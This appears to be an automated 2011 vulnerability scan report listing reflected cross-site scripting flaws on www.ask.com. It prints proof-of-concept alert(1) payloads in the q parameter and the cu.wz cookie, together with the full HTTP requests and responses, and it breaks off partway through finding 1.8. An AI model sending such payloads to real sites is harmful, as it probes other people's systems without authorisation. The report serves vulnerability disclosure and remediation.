XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, www.ask.com

Report generated by XSS.CX at Mon Aug 15 12:31:16 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

XSS in www.ask.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

1.1. http://www.ask.com/news [q parameter]

1.2. http://www.ask.com/news [q parameter]

1.3. http://www.ask.com/pictures [q parameter]

1.4. http://www.ask.com/pictures [q parameter]

1.5. http://www.ask.com/about/legal/privacy [cu.wz cookie]

1.6. http://www.ask.com/news [cu.wz cookie]

1.7. http://www.ask.com/news [cu.wz cookie]

1.8. http://www.ask.com/pictures [cu.wz cookie]

1.9. http://www.ask.com/pictures [cu.wz cookie]

1.10. http://www.ask.com/products/display [cu.wz cookie]

1.11. http://www.ask.com/settings [cu.wz cookie]

1.12. http://www.ask.com/settings [cu.wz cookie]

1.13. http://www.ask.com/web [cu.wz cookie]

1.14. http://www.ask.com/web [cu.wz cookie]

2. Cleartext submission of password

3. Password field submitted using GET method

4. Password field with autocomplete enabled

5. Cookie scoped to parent domain

5.1. http://www.ask.com/about/legal/privacy

5.2. http://www.ask.com/news

5.3. http://www.ask.com/pictures

5.4. http://www.ask.com/products/display

5.5. http://www.ask.com/settings

5.6. http://www.ask.com/web

6. Cross-domain Referer leakage

6.1. http://www.ask.com/news

6.2. http://www.ask.com/pictures

6.3. http://www.ask.com/web

7. Cookie without HttpOnly flag set

7.1. http://www.ask.com/about/legal/privacy

7.2. http://www.ask.com/news

7.3. http://www.ask.com/pictures

7.4. http://www.ask.com/products/display

7.5. http://www.ask.com/settings

7.6. http://www.ask.com/web

8. HTML does not specify charset

9. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 14 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.ask.com/news [q parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /news

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d629</script><script>alert(1)</script>5e777743ea1 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news?o=0&l=dir&qsrc=168&q=xss8d629</script><script>alert(1)</script>5e777743ea1 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictures?o=0&l=dir&qsrc=167&q=xss&v=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjQ4LVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllNwpcQXMAADyFgG0AAAA1
from-tr: trafrt005iad.io.askjeeves.info
Content-Length: 64756
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:07 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:07 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
<iframe id="adi_adLoader" src="http://www.ask.com/display.html?cl=ca-aj-news1&ch=&ty=image%2Cflash&size=300x250&kw=xss8d629</script><script>alert(1)</script>5e777743ea1&hints=xss8d629</script>
...[SNIP]...

1.2. http://www.ask.com/news [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /news

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a56d"><script>alert(1)</script>6a435691c6e was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news?o=0&l=dir&qsrc=168&q=6a56d"><script>alert(1)</script>6a435691c6e HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictures?o=0&l=dir&qsrc=167&q=xss&v=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjQ4LVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllLQpcQKQAAHD@VTYAAAIK
from-tr: trafrt012iad.io.askjeeves.info
Content-Length: 64591
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:27:58 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI3OjU3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:27:57 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
<iframe id="adi_adLoader" src="http://www.ask.com/display.html?cl=ca-aj-news1&ch=&ty=image%2Cflash&size=300x250&kw=6a56d"><script>alert(1)</script>6a435691c6e&hints=6a56d">
...[SNIP]...

1.3. http://www.ask.com/pictures [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40b5e</script><script>alert(1)</script>b21e6c4ebb7 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pictures?o=0&l=dir&qsrc=167&q=xss40b5e</script><script>alert(1)</script>b21e6c4ebb7&v=14 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=xss&search=&qsrc=0&o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjM5LVVUQw%3D%3D&po=0&pp=dir; qc=0; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; wz_sid=084EE34C926D4254193520127E77B26A; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.2.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllNApcQDYAAEsEBg8AAADv
from-tr: trafrt006iad.io.askjeeves.info
Cache-Control: private
Content-Length: 67803
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:05 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA0LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:04 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
<iframe id="adi_adLoader" src="http://www.ask.com/display.html?cl=ca-aj-special&ch=&ty=image%2Cflash&size=300x250&kw=xss40b5e</script><script>alert(1)</script>b21e6c4ebb7&hints=xss40b5e</script>
...[SNIP]...

1.4. http://www.ask.com/pictures [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the q request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8935d"><script>alert(1)</script>72fe6858d8c was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pictures?o=0&l=dir&qsrc=167&q=8935d"><script>alert(1)</script>72fe6858d8c&v=14 HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/web?q=xss&search=&qsrc=0&o=0&l=dir
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjM5LVVUQw%3D%3D&po=0&pp=dir; qc=0; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; wz_sid=084EE34C926D4254193520127E77B26A; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.2.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllIwpcQXMAADyFdcUAAABi
from-tr: trafrt005iad.io.askjeeves.info
Content-Length: 67992
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:27:48 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI3OjQ3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:27:47 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
<iframe id="adi_adLoader" src="http://www.ask.com/display.html?cl=ca-aj-special&ch=&ty=image%2Cflash&size=300x250&kw=8935d"><script>alert(1)</script>72fe6858d8c&hints=8935d">
...[SNIP]...

1.5. http://www.ask.com/about/legal/privacy [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /about/legal/privacy

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb1f2"-alert(1)-"7a4166739ea was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/legal/privacy HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0bb1f2"-alert(1)-"7a4166739ea; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; qc=0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA2LVVUQw%3D%3D&po=0&pp=dir; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.4.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllSQpcQXIAABTifJYAAAEZ
from-tr: trafrt004iad.io.askjeeves.info
Content-Length: 46496
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:25 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjI1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:25 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>

<head>
   <title>About Ask.com: Privacy Policy</title>


<link href="http
...[SNIP]...
{};
WZInfo.pickRedirectDefault = "http://wzus1.ask.com/r?t=p&d=us&s=a&c=h&app=a14&l=dir&o=0&sv=0a5c404b&ip=32177b6a&id=7E2E34D8202F480CD898379E755A71CA&q=&p=0&qs=121&ac=24&g=105dOXJh6osCJW&cu.wz=0bb1f2"-alert(1)-"7a4166739ea";
WZInfo.pickDefault = "http://wzus1.ask.com/i/b.html?t=p&d=us&s=a&c=h&app=a14&l=dir&o=0&sv=0a5c404b&ip=32177b6a&id=7E2E34D8202F480CD898379E755A71CA&q=&p=0&qs=121&ac=24&g=105dOXJh6osCJW&cu.wz=0bb
...[SNIP]...

1.6. http://www.ask.com/news [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /news

Issue detail

The value of the cu.wz cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd43e"-alert(1)-"a9f401dd648 was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news?o=0&l=dir&qsrc=168&q=xss HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictures?o=0&l=dir&qsrc=167&q=xss&v=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0bd43e"-alert(1)-"a9f401dd648; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjQ4LVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllPwpcQDoAAAxvxc8AAAML
from-tr: trafrt010iad.io.askjeeves.info
Cache-Control: private
Content-Length: 77443
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:15 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjE1LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:15 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
Image();
st.height = 1;
st.width = 1;
st.id = "SessionTracker";
st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=bntps&app=a14&l=dir&o=0&sv=0a5c404d&p=news&rf=0&ord=3754410&cu.wz=0bd43e"-alert(1)-"a9f401dd648";


</script>
...[SNIP]...

1.7. http://www.ask.com/news [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /news

Issue detail

The value of the cu.wz cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 392a7"><script>alert(1)</script>c62fd19743e was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /news?o=0&l=dir&qsrc=168&q=xss HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/pictures?o=0&l=dir&qsrc=167&q=xss&v=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0392a7"><script>alert(1)</script>c62fd19743e; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjQ4LVVUQw%3D%3D&po=0&pp=dir; qc=0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllPQpcQKMAAFY@qwcAAAEP
from-tr: trafrt011iad.io.askjeeves.info
Content-Length: 77591
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:13 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjEzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:13 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
<img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=bntps&app=a14&l=dir&o=0&sv=0a5c4050&p=news&rf=0&ord=3589925&cu.wz=0392a7"><script>alert(1)</script>c62fd19743e" height=1 width=1 id="SessionTracker" />
...[SNIP]...

1.8. http://www.ask.com/pictures [cu.wz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ask.com
Path:   /pictures

Issue detail

The value of the cu.wz cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9561"><script>alert(1)</script>e8deaf81c4c was submitted in the cu.wz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

